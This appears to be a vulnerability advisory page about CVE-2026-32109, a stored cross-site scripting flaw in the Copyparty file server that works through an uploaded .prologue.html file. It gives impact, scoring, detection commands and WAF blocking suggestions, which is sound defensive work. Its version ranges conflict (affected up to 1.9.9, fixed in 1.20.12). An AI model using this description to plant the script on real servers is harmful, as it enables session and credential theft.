copyparty
Corrigido em
1.20.13
1.20.12
CVE-2026-32109 describes a Cross-Site Scripting (XSS) vulnerability affecting Copyparty, a portable file server. This flaw allows an attacker with read and write permissions to the server to upload a malicious file named .prologue.html and then execute arbitrary JavaScript in a victim's browser. The vulnerability impacts versions of Copyparty up to 1.9.9, and a fix is available in version 1.20.12.
An attacker can leverage this XSS vulnerability to execute malicious JavaScript code within the context of a user's browser session. This could lead to various harmful outcomes, including session hijacking, credential theft, redirection to phishing sites, and defacement of the file server's interface. The attack requires the attacker to have both read and write access to the Copyparty server's file storage, limiting the immediate scope but still posing a significant risk if such access is compromised. The unexpected behavior of the URL triggering the JavaScript execution makes it easier to exploit.
This vulnerability was publicly disclosed on 2026-03-12. No public proof-of-concept (PoC) code has been observed at the time of writing. The vulnerability is not currently listed on the CISA KEV catalog. The CVSS score is 3.7 (LOW), indicating a relatively low probability of exploitation in the absence of a readily available exploit.
Organizations and individuals using Copyparty for file sharing, particularly those with shared hosting environments or where multiple users have write access to the server's file storage, are at risk. Legacy configurations with overly permissive file permissions are also a concern.
• python / server:
find /path/to/copyparty/files/ -name '.prologue.html'• generic web:
curl -I https://example.com/foo/.prologue.html | grep -i 'content-type: application/javascript'disclosure
Status do Exploit
EPSS
0.01% (percentil 1%)
CISA SSVC
Vetor CVSS
The primary mitigation for CVE-2026-32109 is to upgrade Copyparty to version 1.20.12 or later, which includes the fix for this vulnerability. If upgrading is not immediately feasible, restrict write access to the Copyparty server's file storage to only trusted users. Consider implementing a Web Application Firewall (WAF) with rules to block requests containing the .prologue.html filename or suspicious URL parameters like '?b'. Regularly review file server permissions and audit logs for any unauthorized file uploads.
Atualize copyparty para a versão 1.20.12 ou posterior. Esta versão corrige a vulnerabilidade de execução inesperada de JavaScript através de URLs manipuladas.
Análise de vulnerabilidades e alertas críticos diretamente no seu e-mail.
CVE-2026-32109 is a Cross-Site Scripting (XSS) vulnerability in Copyparty versions up to 1.9.9. An attacker can upload a file and execute JavaScript via a crafted URL if they have write access.
You are affected if you are using Copyparty version 1.9.9 or earlier and have users with read/write access to the server's file storage.
Upgrade Copyparty to version 1.20.12 or later. As a temporary workaround, restrict write access and consider WAF rules.
There is no confirmed active exploitation of CVE-2026-32109 at this time, but the vulnerability is publicly known.
Refer to the Copyparty project's official website or GitHub repository for the latest security advisories and updates.
Envie seu arquivo de dependências e descubra na hora se esta e outras CVEs te atingem.
Envie seu arquivo requirements.txt e descubra na hora se você está afetado.